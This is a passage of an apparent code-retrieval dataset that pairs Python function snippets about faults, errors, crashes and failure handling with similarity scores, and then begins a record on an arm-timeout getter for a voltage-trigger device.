"def tasks_with_errors(self):\n errs = []\n while True:\n try:\n errs.append(self._errq.get_nowait())\n except Queue.Empty:\n break\n return errs",
"def dependencies(self):\n return self._dependency_analyzer.GetDependencies(\n [self.stacktrace.crash_stack] if self.stacktrace else [])",
"def server_fault(e):\n return \"Something went wrong, and it is our fault. Try reloading the page.\"",
"def clear_faults(self, session, params):\n\n session.set_status('running')\n yield self.acu_control.clear_faults()\n session.set_status('stopping')\n return True, 'Job completed.'",
"def get_exception_trap():\n return CRDS_EXCEPTION_TRAP",
"def retry_failed(self):\n \n if self.failed:\n n_rounds = len(self.failed)\n retrieved = []\n \n for _ in range(n_rounds):\n r_failed = self.failed.popleft()\n \n # List[<Result>]\n results_new = self.search(\n r_failed.query,\n **r_failed.params\n )\n \n if results_new:\n retrieved.append(results_new[0])\n \n return retrieved",
"def __get_fault(self, mps_db_session, fault_id):\n fault = mps_db_session.query(models.Fault).filter(models.Fault.id==fault_id).all()\n\n if len(fault) == 1:\n return fault[0]\n elif len(fault) == 0:\n raise ValueError(\"Function \\\"__get_fault(fault_id={}). Not fault was found.\\\"\"\n .format(fault_id))\n else:\n raise ValueError(\"Function \\\"__get_fault(fault_id={}). More than one fault matches\\\"\"\n .format(fault_id))",
"def checkReissues(self):\n return None",
"def errors(self) -> List[Error]:",
"def get_stalled_issues(self):\n \n print \"Getting stalled issues\"\n \n # Mark issues stalled if over limit \n for v in self.issue_objs.values():\n if (v.issue_type == \"New Feature\") and (v.status not in [\"Open\", \"In Progress\", \"Reopened\", \"Resolved\", \"Closed\"]):\n if int(v.time_in_status) > int(self.config.get(v.issue_type, v.status)):\n v.stalled = True\n for st in v.subtasks.values():\n if (st.status == \"In Progress\") and (st.time_in_status > int(self.config.get(v.issue_type, v.status))):\n st.stalled = True\n elif (st.status == \"In Progress\") and (st.time_in_status < int(self.config.get(v.issue_type, v.status))):\n v.stalled = False\n st.stalled = False\n \n # Put stalled issues in list\n self.stalled_nf_issues = sorted([obj for obj in self.issue_objs.values() if ((obj.issue_type == \"New Feature\") and obj.stalled)], key=operator.attrgetter('status')) # Stalled New Features\n self.stalled_st_issues = sorted([st for obj in self.stalled_nf_issues if len(obj.subtasks) for st in obj.subtasks.values() if st.stalled], key=operator.attrgetter('status')) # Stalled subtasks",
"def get_unbroken_instances(self):\n return self._get_cond_instance(cond=0)",
"def get_fatal_alerts(self, path):",
"def _grab_sanitizer_trace(self):\n inside_sanitizer_trace = False\n self.crash_trace = []\n while True:\n captured_line = self.terminal_queue.get()\n if self.print_subprocess_output:\n print(captured_line.strip(\"\\n\"))\n if self.monitor_console:\n self.console_log.append(captured_line)\n if not inside_sanitizer_trace:\n if captured_line.find(\"ERROR: AddressSanitizer\") != -1 and captured_line.find(\"AddressSanitizer failed to allocate\") == -1:\n inside_sanitizer_trace = True\n if inside_sanitizer_trace and \\\n (captured_line.find(\"Stats: \") != -1 or\n captured_line.find(\"ABORTING\") != -1 or\n captured_line.find(\"ERROR: Failed\") != -1):\n inside_sanitizer_trace = False\n self.failure = True\n break\n if inside_sanitizer_trace:\n self.crash_trace.append(captured_line)\n if self.failure and self._IsRunning():\n self.process.terminate()\n self.process.kill()\n self.process = None",
"def get_internal_errors(self) -> Dict[str, int]:\n self.serial.write(b\"D!\")\n values = self.__read_response(4)\n first_address_byte_errors = self.__extract_int(values[0], b\"!E1\")\n command_byte_errors = self.__extract_int(values[1], b\"!E2\")\n second_address_byte_errors = self.__extract_int(values[2], b\"!E3\")\n PEC_byte_errors = self.__extract_int(values[3], b\"!E4\")\n\n return {\n \"first_address_byte_errors\": first_address_byte_errors,\n \"command_byte_errors\": command_byte_errors,\n \"second_address_byte_errors\": second_address_byte_errors,\n \"PEC_byte_errors\": PEC_byte_errors,\n }",
"def evaluate_fault_displacements(self,points,scale=True):\n if scale:\n points = self.scale(points,inplace=False)\n vals = np.zeros(points.shape[0])\n for f in self.features:\n if f.type == 'fault':\n disp = f.displacementfeature.evaluate_value(points)\n vals[~np.isnan(disp)] += disp[~np.isnan(disp)]\n return vals*-self.scale_factor # convert from restoration magnutude to displacement",
"def get_diagnostics(self) -> List[Diagnostic]:\n raise NotImplementedError",
"def as_fault(self):\n return Fault(self.fault_code, self.internal_message or\n 'unknown server error')",
"def getFailedJobs(self):\n return self.__failedJobs",
"def errors_fatal(self) -> List[Error]:\n return self._errors_fatal_files + self._errors_fatal",
"def test_sync_call_not_ignore_error(self):\n actors = [Actor.remote(i) for i in range(4)]\n manager = FaultTolerantActorManager(actors=actors)\n\n results = []\n for _ in range(10):\n manager.probe_unhealthy_actors(mark_healthy=True)\n results.extend(manager.foreach_actor(lambda w: w.call()))\n # Wait for actors to recover.\n wait_for_restore()\n\n # Some calls did error out.\n self.assertTrue(any([not r.ok for r in results]))\n\n manager.clear()",
"def get_backend_resistance(dirs, outDir):\n return get_response_stats(dirs, outDir, \"segfault\")",
"def getErrors(self) -> java.util.Collection:\n ...",
"def get_number_of_crashes(result_info):\n assert isinstance(result_info, dict)\n # FIXME: We can't use analyse.get_generic_run_outcomes()\n # because we can't distinguish between a crash and an out\n # of memory situation properly\n #reports = analyse.get_generic_run_outcomes(result_info)\n is_merged_result = analyse.raw_result_info_is_merged(result_info)\n non_zero_exit_code_count = 0 # Only counted if it wasn't an out of memory run\n out_of_memory_count = 0\n if is_merged_result:\n assert isinstance(result_info['out_of_memory'], list)\n assert isinstance(result_info['exit_code'], list)\n assert len(result_info['out_of_memory']) == len(result_info['exit_code'])\n for index, oom in enumerate(result_info['out_of_memory']):\n corresponding_exit_code = result_info['exit_code'][index]\n if oom is True:\n out_of_memory_count += 1\n elif corresponding_exit_code is not None and corresponding_exit_code != 0:\n non_zero_exit_code_count += 1\n else:\n if result_info['out_of_memory'] is True:\n out_of_memory_count += 1\n elif result_info['exit_code'] is not None and result_info['exit_code'] != 0:\n non_zero_exit_code_count += 1\n return non_zero_exit_code_count + out_of_memory_count",
"def GetFailures(self):\n return self._compute_client.all_failures",
"def getTraceback(self):\n self.mostLikelyPath = zeros((1, self.T+2))\n\n self.mostLikelyPath[0,0] = 0\n self.mostLikelyPath[0,-1] = self.noOfEmmittingStates+1\n\n for s in range(self.T, 0, -1):\n self.mostLikelyPath[0,s] = self.traceback[self.mostLikelyPath[0,s+1]-1, s]",
"def flushErrors(exc_type: type) -> list[Exception]:\n # There is no public API for flushing logged errors if you're not\n # using one of trial's TestCase classes...\n from twisted.trial.runner import _logObserver # type: ignore[attr-defined]\n\n result = _logObserver.flushErrors(exc_type)\n assert isinstance(result, list)\n return result",
"def _log_crash_report():\n # For each crash report we find, dump its contents.\n # In theory we clean up after a crash so there should be only one.\n cwd = os.getcwd()\n for entry in os.listdir('.git'):\n if entry.startswith('fast_import_crash_'):\n with open(os.path.join(cwd, '.git', entry)) as f:\n report = f.read()\n # Keep the message free of repetition.\n LOG.error(\"git {}:\\n{}\".format(entry, report))",
"def handle_fault(self, event):\n msg = \"Faulty event '{}' with payload '{}' was received by state '{}'\".format(event.name, event.payload, self.name)\n raise RuntimeError(msg)",
"def _get_problem_list(self):\r\n self._success_response({'problem_list': self.server.problem_list})",
"def _find_tainted_callers(self, key_addr, f_addr):\n\n p = self._current_p\n\n self.callsites = []\n # prepare the under-contrainted-based initial state\n # we do not allow untaint as we just want to see where the key string is leading to\n self._core_taint = coretaint.CoreTaint(p, interfunction_level=0, smart_call=False,\n follow_unsat=True,\n try_thumb=True,\n exit_on_decode_error=True, force_paths=True, allow_untaint=False,\n logger_obj=log)\n\n self._current_key_addr = key_addr\n s = self._prepare_state(key_addr, f_addr)\n summarized_f = self._prepare_function_summaries()\n\n self._core_taint.set_alarm(TIMEOUT_TAINT, n_tries=TIMEOUT_TRIES)\n\n try:\n self._core_taint.run(s, (), (), summarized_f=summarized_f, force_thumb=False,\n check_func=self._find_taint_callers, init_bss=False)\n except TimeOutException:\n log.warning(\"Timeout Triggered\")\n except Exception as e:\n log.warning(\"Exception: %s\" % str(e))\n\n self._core_taint.unset_alarm()\n callsites = []\n for cs in self.callsites:\n try:\n if self._current_cfg.get_any_node(cs[0]).function_address == f_addr and cs not in callsites:\n callsites.append(cs)\n except:\n pass\n\n return callsites",
"def get_resources():\n # Acquire the lock...\n get_resources_lock.acquire()\n\n # ...but always release it\n try:\n # Construct the dictionaries as copies from nanny\n (limits,usage) = nanny.get_resource_information()\n\n\n # Calculate all the usage's\n pid = os.getpid()\n\n # Get CPU and memory, this is thread specific\n if ostype in [\"Linux\", \"Darwin\"]:\n \n # Get CPU first, then memory\n usage[\"cpu\"] = os_api.get_process_cpu_time(pid)\n\n # This uses the cached PID data from the CPU check\n usage[\"memory\"] = os_api.get_process_rss()\n\n # Get the thread specific CPU usage\n usage[\"threadcpu\"] = os_api.get_current_thread_cpu_time() \n\n\n # Windows Specific versions\n elif ostype in [\"Windows\"]:\n \n # Get the CPU time\n usage[\"cpu\"] = windows_api.get_process_cpu_time(pid)\n\n # Get the memory, use the resident set size\n usage[\"memory\"] = windows_api.process_memory_info(pid)['WorkingSetSize'] \n\n # Get thread-level CPU \n usage[\"threadcpu\"] = windows_api.get_current_thread_cpu_time()\n\n # Unknown OS\n else:\n raise EnvironmentError(\"Unsupported Platform!\")\n\n # Use the cached disk used amount\n usage[\"diskused\"] = cached_disk_used\n\n finally:\n # Release the lock\n get_resources_lock.release()\n\n # Copy the stop times\n stoptimes = process_stopped_timeline[:]\n\n # Return the dictionaries and the stoptimes\n return (limits,usage,stoptimes)",
"def trace(context=1):\r\n return getinnerframes(sys.exc_info()[2], context)",
"def main():\n cause_a_bunch_of_exceptions_to_happen()",
"def __exc_info(self):\n exctype, excvalue, tb = sys.exc_info()\n if sys.platform[:4] == 'java': ## tracebacks look different in Jython\n return (exctype, excvalue, tb)\n return (exctype, excvalue, tb)",
"def check(self):\n curtime = time.time()\n failed_watchdogs = []\n for watchdog, filename, st_info in self._list_gen(self.watchdog_path):\n if curtime < st_info.st_mtime:\n # If the watchdog is set in the future, then service is still\n # alive\n pass\n\n else:\n # Otherwise, this is a watchdog failure\n _LOGGER.warning('Watchdog failed: %r.', watchdog)\n failed_watchdogs.append((filename, watchdog, st_info.st_mtime))\n\n # Retreive the payload of failed watchdogs\n if failed_watchdogs:\n failures = []\n for filename, name, failed_at in failed_watchdogs:\n try:\n with open(filename, 'r') as f:\n data = f.read()\n except OSError:\n _LOGGER.exception('Reading watchdog data')\n data = ''\n failures.append((name, failed_at, data))\n\n return failures\n\n else:\n return []",
"def _localHandleFailedRuns(self, failedRuns):\n if len(failedRuns) > 0:\n self.raiseADebug(' Continuing with reduced-size Monte-Carlo sampling.')",
"def collect_free_breaks(self, *args):\n return _ida_hexrays.cinsn_t_collect_free_breaks(self, *args)",
"def snmpqosqos_sch_leaf_recycle_failures(self) :\n\t\ttry :\n\t\t\treturn self._snmpqosqos_sch_leaf_recycle_failures\n\t\texcept Exception as e:\n\t\t\traise e",
"def _look_for_new_crash_logs(self, run_results, start_time):\n crashed_processes = []\n test_to_crash_failure = {}\n\n # reset static variables for Failure type classes\n test_failures.AbstractTestResultType.port = self._port\n test_failures.AbstractTestResultType.result_directory = self._results_directory\n test_failures.AbstractTestResultType.filesystem = self._filesystem\n\n for test, result in run_results.unexpected_results_by_name.items():\n if result.type != ResultType.Crash:\n continue\n for failure in result.failures:\n if (not isinstance(failure, test_failures.FailureCrash)\n or failure.has_log):\n continue\n crashed_processes.append(\n [test, failure.process_name, failure.pid])\n test_to_crash_failure[test] = failure\n\n sample_files = self._port.look_for_new_samples(crashed_processes,\n start_time) or {}\n for test, sample_file in sample_files.items():\n test_failures.AbstractTestResultType.test_name = test\n test_result = run_results.unexpected_results_by_name[test]\n artifact_relative_path = self._port.output_filename(\n test, test_failures.FILENAME_SUFFIX_SAMPLE, '.txt')\n artifacts_sub_dir = test_result.artifacts.ArtifactsSubDirectory()\n artifact_abspath = self._filesystem.join(self._results_directory,\n artifacts_sub_dir,\n artifact_relative_path)\n self._filesystem.maybe_make_directory(\n self._filesystem.dirname(artifact_abspath))\n self._filesystem.copyfile(sample_file, artifact_abspath)\n test_result.artifacts.AddArtifact(\n 'sample_file',\n self._filesystem.join(artifacts_sub_dir,\n artifact_relative_path))\n\n new_crash_logs = self._port.look_for_new_crash_logs(\n crashed_processes, start_time) or {}\n for test, (crash_log, crash_site) in new_crash_logs.items():\n test_failures.AbstractTestResultType.test_name = test\n failure.crash_log = crash_log\n failure.has_log = self._port.output_contains_sanitizer_messages(\n failure.crash_log)\n test_result = run_results.unexpected_results_by_name[test]\n test_result.crash_site = crash_site\n test_to_crash_failure[test].create_artifacts(\n test_result.artifacts, force_overwrite=True)",
"def geterr():\n return __errprof.state.copy()",
"def clean_stale_issues():\n from security_monkey.common.audit_issue_cleanup import clean_stale_issues\n clean_stale_issues()",
"def get_all_failures(self):\n return self._get_filtered_results(success=False)",
"def storefront_check_errors():\n\n\tcurrentView = uidoc.ActiveView\n\tfamTypeDict = GetFamilyTypeDict(\"Fabrication-Error-Symbol\")\n\n\t# Clear existing error notations\n\terrorNotations = list(GetElementsInView(BuiltInCategory.OST_GenericAnnotation, Autodesk.Revit.DB.FamilyInstance, currentView.Id))\n\terrorNotations = FilterElementsByName(doc, errorNotations,[\"Fabrication\",\"Error-Symbol\"], False)\n\tif errorNotations:\n\t\twith rpw.db.Transaction(\"Place Errors\"):\n\t\t\tfor error in errorNotations:\n\t\t\t\tdoc.Delete(error)\n\n\n\tdef PointsAndErrors(mullions_list, errorName, cat_or_ids):\n\t\t\"\"\"adds to lists of points and errors\"\"\"\n\t\terrorsToFlag = []\n\t\tcompList =[]\n\t\tfor m in mullions_list:\n\t\t\tmElem = doc.GetElement(m)\n\t\t\tif m not in compList:\n\t\t\t\tintersectingMulls = FindIntersectingMullions(mElem, cat_or_ids)\n\t\t\t\tif list(intersectingMulls):\n\t\t\t\t\tmullPt = mElem.Location.Point\n\t\t\t\t\terrorsToFlag.append([mullPt, errorName])\n\t\t\t\t\tfor mm in list(intersectingMulls):\n\t\t\t\t\t\tcompList.append(mm.Id)\n\t\treturn errorsToFlag\n\n\tdef MullionClash():\n\n\t\terrorsToFlag = []\n\n\t\tselectedLevel = __revit__.ActiveUIDocument.ActiveView.GenLevel.Id\n\n\t\tallMullions = GetAllElements(doc, BuiltInCategory.OST_CurtainWallMullions, Autodesk.Revit.DB.FamilyInstance, currentView=True)\n\t\tallWalls = GetAllElements(doc, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall, currentView=True)\n\n\t\tallWalls = FilterElementsByName(doc, allWalls, [\"Storefront\",\"Storefront\"], True)\n\n\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Mullion Intersects\", BuiltInCategory.OST_CurtainWallMullions)\n\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Panel Intersects\", BuiltInCategory.OST_CurtainWallPanels)\n\t\tif allWalls:\n\t\t\terrorsToFlag += PointsAndErrors(allMullions, \"Mullion-Wall Intersects\", allWalls)\n\n\t\treturn errorsToFlag\n\n\tdef PanelClash():\n\n\n\t\terrorsToFlag = []\n\t\t\n\t\tallPanels = GetAllElements(doc, BuiltInCategory.OST_Windows, Autodesk.Revit.DB.FamilyInstance, currentView=True)\n\t\tallPanels = FilterDemolishedElements(doc, allPanels)\n\n\t\tpanelMinWidth = 0.45\n\t\tpanelMaxWidth = 5.0\n\t\tpanelMaxHeight = 8.14\n\n\t\t### ITERATE OVER PANEL LIST ###\n\t\tfor p in allPanels:\n\t\t\tfamInst = doc.GetElement(p)\n\n\t\t\tpan_height = famInst.Parameter[BuiltInParameter.FAMILY_HEIGHT_PARAM].AsDouble()\n\t\t\tpan_width = famInst.Parameter[BuiltInParameter.FAMILY_WIDTH_PARAM].AsDouble()\n\n\t\t\tif \"empty\" not in famInst.Name.lower():\n\t\t\t\tif pan_width < panelMinWidth:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Small Panel\"])\n\t\t\t\telif pan_width > panelMaxWidth:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Wide Panel\"])\n\t\t\t\telif pan_height > panelMaxHeight:\n\t\t\t\t\terrorsToFlag.append([famInst.GetTransform().Origin, \"Tall Panel\"])\n\t\t\telse:\n\t\t\t\tpass\n\t\t\n\t\treturn errorsToFlag\n\n\tdef ECWallClash():\n\n\t\terrorsToFlag = []\n\t\tcolumnsLinesEdgesEC = []\n\t\twallsLinesEdgesEC = []\n\n\n\t\tdocLoaded = RevitLoadECDocument(quiet=True)\n\t\tif docLoaded[0]:\n\t\t\tdocEC = docLoaded[0]\n\t\t\tecTransform = docLoaded[1]\n\n\t\t\tselectedLevel = __revit__.ActiveUIDocument.ActiveView.GenLevel.Id\n\n\t\t\tselectedLevelInst = doc.GetElement(selectedLevel)\n\t\t\tlevelElevationEC = None \n\t\t\tfor p in selectedLevelInst.Parameters:\n\t\t\t\tif p.Definition.Name == \"Elevation\":\n\t\t\t\t\tlevelElevationEC = 
p.AsDouble()\n\n\t\t\tallWallsEC = GetAllElements(docEC, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall)\n\t\t\tallColumnsEC = GetAllElements(docEC, BuiltInCategory.OST_Columns, Autodesk.Revit.DB.FamilyInstance)\n\t\t\tallColumnsEC += GetAllElements(docEC, BuiltInCategory.OST_StructuralColumns, Autodesk.Revit.DB.FamilyInstance)\n\n\t\t\tselectedWallsEC = FilterElementsByLevel(docEC, allWallsEC, levelElevationEC)\n\t\t\tselectedColumnsEC = FilterElementsByLevel(docEC, allColumnsEC, levelElevationEC)\n\n\t\t\twallsLinesEdgesEC = GetWallEdgeCurves(docEC, selectedWallsEC, ecTransform)\n\t\t\tcolumnsLinesEdgesEC = GetColumnEdgeCurves(docEC, selectedColumnsEC, ecTransform)\n\n\t\tallWalls = GetAllElements(doc, BuiltInCategory.OST_Walls, Autodesk.Revit.DB.Wall, currentView=True)\n\t\tstorefrontWalls = FilterElementsByName(doc, allWalls,[\"Storefront\",\"Storefront\"], False)\n\t\tstorefrontWalls = FilterWallsByKind(doc, storefrontWalls, \"Basic\")\n\n\t\tobstructionEdges = columnsLinesEdgesEC\n\t\tobstructionEdges += wallsLinesEdgesEC\n\n\t\tif obstructionEdges:\n\t\t\tfor sfWallId in storefrontWalls:\n\t\t\t\tsfWall = doc.GetElement(sfWallId)\n\t\t\t\tlocLine = sfWall.Location.Curve\n\t\t\t\tlocLineStart = locLine.GetEndPoint(0)\n\t\t\t\tlocLineEnd = locLine.GetEndPoint(1)\n\n\t\t\t\tfor obstructionLine in obstructionEdges:\n\t\t\t\t\tobstLineElevation = obstructionLine.GetEndPoint(0).Z\n\t\t\t\t\tlocLineStart = XYZ(locLineStart.X, locLineStart.Y, obstLineElevation)\n\t\t\t\t\tlocLineEnd = XYZ(locLineEnd.X, locLineEnd.Y, obstLineElevation)\n\t\t\t\t\tlocLineFlat = Line.CreateBound(locLineStart, locLineEnd)\n\t\t\t\t\tintersection = RevitCurveCurveIntersection(locLineFlat,obstructionLine)\n\n\t\t\t\t\tif intersection:\n\t\t\t\t\t\t#ERROR: Hit Existing Condition\n\t\t\t\t\t\terrorsToFlag.append([intersection, \"Hit EC\"])\n\n\t\treturn errorsToFlag\n\n\tallErrors = []\n\tallErrors += ECWallClash()\n\tallErrors += MullionClash()\n\tallErrors += PanelClash()\n\n\terrorSymbolId = famTypeDict[\"Fabrication-Error-Symbol\"]\n\n\tif allErrors:\n\t\twith rpw.db.Transaction(\"Error Check\"):\n\t\t\tRevitPlaceErrorsInView(currentView, allErrors, errorSymbolId)",
"def get_crash_events_data(self, tc_name):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)",
"def check_errors(self) -> None:\n # TODO check the manual for error codes & interpert them.\n return self.send(self.cmd.GET_GLOBALSTATUS_CURRENTERROR)",
"def getPendingFailedRejectedOSPatches(self, df: str = None, ts: str = None, status: str = None,\n patch_type: str = None, severity: str = None, cursor: str = None,\n pageSize: int = None):\n params = {\n 'df': df,\n 'ts': ts,\n 'status': status,\n 'type': patch_type,\n 'severity': severity,\n 'cursor': cursor,\n 'pageSize': pageSize\n }\n return self.api_get_request(f'{self.NINJA_API_QUERIES_OS_PATCHES}', params=params)",
"def traceback(self):",
"def diagnostic_trouble_codes(self):\n return self._diagnostic_trouble_codes",
"def getReplicasLFC(guids, lfchost):\n\n ec = 0\n pilotErrorDiag = \"\"\n error = PilotErrors()\n replica_list = []\n\n try:\n import lfc\n except Exception, e:\n pilotErrorDiag = \"getReplicasLFC() could not import lfc module: %s\" % str(e)\n ec = error.ERR_GETLFCIMPORT\n\n tolog(\"Get function using LFC_HOST: %s\" % (lfchost))\n\n os.environ['LFC_HOST'] = lfchost\n os.environ['LFC_CONNTIMEOUT'] = '60'\n os.environ['LFC_CONRETRY'] = '2'\n os.environ['LFC_CONRETRYINT'] = '60'\n\n try:\n ret, replica_list = lfc.lfc_getreplicas(guids, \"\")\n except Exception, e:\n pilotErrorDiag = \"Failed to get LFC replicas: Exception caught: %s\" % str(e)\n tolog(\"!!FAILED!!2999!! %s\" % (pilotErrorDiag))\n tolog(\"getReplicasLFC() finished (failed)\")\n ec = error.ERR_FAILEDLFCGETREPS\n\n if ret != 0:\n err_num = lfc.cvar.serrno\n err_string = lfc.sstrerror(err_num)\n pilotErrorDiag = \"Failed to get LFC replicas: %d (lfc_getreplicas failed with: %d, %s)\" %\\\n (ret, err_num, err_string)\n tolog(\"!!WARNING!!2999!! %s\" % (pilotErrorDiag))\n tolog(\"getReplicas() finished (failed)\")\n ec = error.ERR_FAILEDLFCGETREPS\n\n return ec, pilotErrorDiag, replica_list",
"def _get_resends(self):\n if not self.has_error():\n return []\n\n errors = []\n i = 0\n for item in self.my_json['results']:\n if item.has_key('error') and item['error'] == 'Unavailable':\n errors.append((i, item['error']))\n i += 1\n return errors",
"def find_backtrace(self):\n return [ft for ft in os.listdir(self.output_dir)\n if os.path.isfile(ft) and ft.startswith(\"Backtrace.\")]",
"def test_launch_failures_hw(self):\n self.test_launch_failures()",
"def GetExpectedCrashes(self, args: ct.TestArgs) -> None:\n # args[0] is the PixelTestPage for the current test.\n return args[0].expected_per_process_crashes",
"def _raise_performing_request_error(self, *args, **kwargs):",
"def on_request_error(locust_instance, exception, tb, **kwargs):",
"def after_make_v202111_runoff_file(msg, config, checklist):\n next_workers = {\"crash\": [], \"failure\": [], \"success\": []}\n return next_workers[msg.type]",
"def loading_failures():\n\n import simtk.openmm as mm\n print(mm.Platform.getPluginLoadFailures())",
"def test_obtain_issues_http_error(self, mock_url_read):\n mock_url_read.side_effect = urllib.error.HTTPError('raise', None, None, None, None)\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)",
"def test_sync_call_healthy_only(self):\n actors = [Actor.remote(i) for i in range(4)]\n manager = FaultTolerantActorManager(actors=actors)\n\n results = []\n for _ in range(10):\n results.extend(manager.foreach_actor(lambda w: w.call()).ignore_errors())\n # Wait for actors to recover.\n wait_for_restore()\n\n # Notice that since we only fire calls against healthy actors,\n # we wouldn't be aware that the actors have been recovered.\n # So once an actor is taken out of the lineup (10% chance),\n # it will not go back in, and we should have few results here.\n # Basically takes us 7 calls to kill all the actors.\n # Note that we can hardcode 10 here because we are using deterministic\n # sequences of random numbers.\n self.assertEqual(len(results), 7)\n\n manager.clear()",
"def get_far_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_fcref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_fcref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_fcref_from( ea, xrf )\r\n\treturn ret",
"def threat_exceptions(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"threat_exceptions\")"
] | [
"0.6717997",
"0.61814696",
"0.5997935",
"0.5937447",
"0.5786711",
"0.5544165",
"0.5489587",
"0.54597056",
"0.53924805",
"0.53853124",
"0.53460693",
"0.53460693",
"0.5332667",
"0.5330461",
"0.5298619",
"0.5260537",
"0.5236995",
"0.5182294",
"0.5093936",
"0.50649893",
"0.5040983",
"0.5036408",
"0.5035424",
"0.50090665",
"0.50085974",
"0.4980584",
"0.49759415",
"0.49644327",
"0.4933094",
"0.49291593",
"0.49235272",
"0.49101245",
"0.49047002",
"0.49002713",
"0.4878564",
"0.48696467",
"0.48670208",
"0.48593932",
"0.48448092",
"0.48208028",
"0.48112774",
"0.4809371",
"0.48079124",
"0.48030305",
"0.47844744",
"0.47835907",
"0.4767053",
"0.4759268",
"0.475307",
"0.47482467",
"0.474175",
"0.4723633",
"0.4723309",
"0.47175163",
"0.47131613",
"0.4712467",
"0.4704188",
"0.46872148",
"0.46870866",
"0.46737298",
"0.4673241",
"0.4669778",
"0.4668355",
"0.4664168",
"0.46476328",
"0.46388653",
"0.4628997",
"0.46283606",
"0.46077117",
"0.46054804",
"0.46047163",
"0.4588132",
"0.45770726",
"0.45751572",
"0.4570581",
"0.45663217",
"0.456078",
"0.455937",
"0.45520166",
"0.4548669",
"0.45480132",
"0.4546465",
"0.45412332",
"0.45367056",
"0.45305178",
"0.45297685",
"0.45287573",
"0.45283678",
"0.4518613",
"0.45016453",
"0.45002225",
"0.44964063",
"0.44877067",
"0.44797888",
"0.44690195",
"0.4467461",
"0.44488028",
"0.44455418",
"0.44430178",
"0.44412142"
] | 0.807573 | 0 |
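A minimal usage sketch for the get_faults_latched record above. All names below are illustrative stand-ins: the real class holding config_16, get_option_from_shouter, and __get_faults_list is not part of this record, so this only shows the filtering pattern that turns a fault table into a list of set fault names.

    # Hypothetical stand-in for config_16.faults_latched: bit index -> {name, value}
    faults_latched = {
        0: {'name': 'fault_probe', 'value': True},
        1: {'name': 'fault_overtemp', 'value': False},
        2: {'name': 'fault_overvoltage', 'value': True},
    }

    def faults_to_list(faults):
        # Same pattern as the __get_faults_list helper shown in the negatives:
        # keep only the names of faults whose value flag is set.
        return [f['name'] for f in faults.values() if f['value']]

    print(faults_to_list(faults_latched))  # -> ['fault_probe', 'fault_overvoltage']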
Arm timeout. Because of safety reasons we will monitor the trigger when in the armed state. The trigger needs to be activated within the programmed timeout. Every trigger pulse will reset the timer. If the timeout occurs, the shouter will disarm and disable the high voltage circuitry. The Arm timer will be reset on every trigger, internal or external. NOTE: Valid range is between 1 and 60 minutes. | def get_arm_timeout(self, timeout = 0):
self.get_option_from_shouter([t_16_Bit_Options.ARM_TIMEOUT], BP_TOOL.REQUEST_16)
return self.config_16.options[t_16_Bit_Options.ARM_TIMEOUT]['value'] | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def timeout(self):\n self.timeout_scan_flag=True\n self.timer.stop()\n self.status_sig.emit([\"Update_Status\",\"Timeout during acquisition\",'log'])\n self.status_sig.emit([\"Timeout\"])",
"def set_timeout(self, timeout):\r\n return self._arm.set_timeout(timeout)",
"def power_off(timeout: int = 0) -> None:",
"def reset_timeout (self, new_timeout):\n self.timer.cancel()\n self.timer = Timeout(new_timeout, TestIsTakingTooLong(new_timeout))",
"def event_m10_29_x35():\r\n \"\"\"State 0,2: Timer start judgment\"\"\"\r\n CompareAreaTimer(0, 0, 0, 0)\r\n CompareAreaTimer(1, 0, 0, 2)\r\n if ConditionGroup(0):\r\n \"\"\"State 3: Start area timer\"\"\"\r\n StartAreaTimer(0)\r\n elif ConditionGroup(1):\r\n \"\"\"State 4: Restart area timer\"\"\"\r\n RestartAreaTimer(0)\r\n \"\"\"State 1: Has the waiting time been exceeded?\"\"\"\r\n CompareAreaTimer(0, 0, 300, 2)\r\n assert ConditionGroup(0)\r\n \"\"\"State 5: Stop area timer\"\"\"\r\n PauseAreaTimer(0)\r\n \"\"\"State 6: End state\"\"\"\r\n return 0",
"def alarm_t(self, **kwargs):\n if self.verbose:\n print(\"\\t{} |{}| Initialization begins.\".format(Timer.OK, self.tinfo['name']))\n time_asleep = 1\n if self.testmode is False:\n while self.tinfo['alarm_time'] >= datetime.now():\n if time_asleep % 60 == 0:\n if self.verbose:\n print(\"|{}| +1 minute.\".format(datetime.now().strftime(\"%H:%M:%S\"))) \n time_asleep += 1\n sleep(1)\n self.execute_target(self.tinfo)\n return True\n elif self.testmode is True:\n print(\"\\t{} **** TESTMODE.Forcing immediate exec!\".format(Timer.OK))\n self.execute_target()\n return True\n else:\n print(\"\\t testmode must be True or False!\")\n return False",
"def lightleep(time_ms: int = None) -> None:",
"def time_pulse_us(pin:Pin, pulse_level:int, timeout_us:int=1000000, /) -> int:",
"def clear_timeout():\n signal.alarm(0)",
"def stop_alarm(self):\n self.out_power.pulse()",
"def timeragent(forwho,timeoutfunction,interval):\r\n\r\n timerx = QtCore.QTimer()\r\n timerx.setInterval(interval)\r\n timerx.stop()\r\n\r\n forwho.connect(timerx,SIGNAL(\"timeout()\"),timeoutfunction)\r\n return timerx",
"def get_trigger(self, timeout=300):\n with self.vr_protect:\n newtrig = trigger(self.vr_trig_queue, timeout=timeout)\n if self.vr_monthread is None:\n self.camhand.start_camera() # starts camera if not running\n self.vr_monthread = threading.Thread(name='recorder', target=self.monitor, args=[newtrig])\n self.vr_monthread.start()\n else:\n print('already ready')\n self.vr_trig_queue.put((newtrig,'add')) # add to q first so the new thread has one to pick up\n return newtrig",
"def test_timeoutReset(self):\n for i in range(3):\n self.circuit_breaker.failure()\n self.time.advance(29.0)\n available29sec = self.circuit_breaker.available()\n self.time.advance(1.1)\n available30sec = self.circuit_breaker.available()\n self.assertEqual((available29sec, available30sec),\n (False, True))",
